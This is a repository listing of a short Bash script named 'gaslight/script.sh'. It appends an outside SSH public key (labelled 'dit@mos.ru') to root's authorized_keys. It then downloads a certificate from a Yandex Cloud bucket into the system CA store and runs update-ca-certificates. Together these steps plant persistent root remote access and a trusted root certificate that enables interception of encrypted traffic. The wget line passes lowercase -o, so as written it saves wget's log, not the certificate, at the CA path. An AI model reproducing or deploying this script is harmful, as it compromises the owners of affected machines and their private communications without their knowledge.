Files
gaslight/script.sh
2026-04-23 20:36:37 +03:00

5 lines
265 B
Bash
Executable File

mkdir /root/.ssh
echo "\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILEtwRGPeVhGF5OoRrGipVtUAZEdYQY8kjj9gyi6z824 dit@mos.ru" >> /root/.ssh/authorized_keys
wget https://storage.yandexcloud.net/hzz/cert.pem -o /usr/local/share/ca-certificates/dit.crt
update-ca-certificates